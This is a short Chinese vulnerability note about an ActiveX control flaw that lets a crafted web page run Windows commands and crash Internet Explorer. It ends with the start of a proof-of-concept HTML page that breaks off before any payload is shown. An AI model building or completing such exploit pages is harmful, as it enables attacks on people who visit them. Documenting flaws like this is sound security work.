该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。

测试代码

<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
...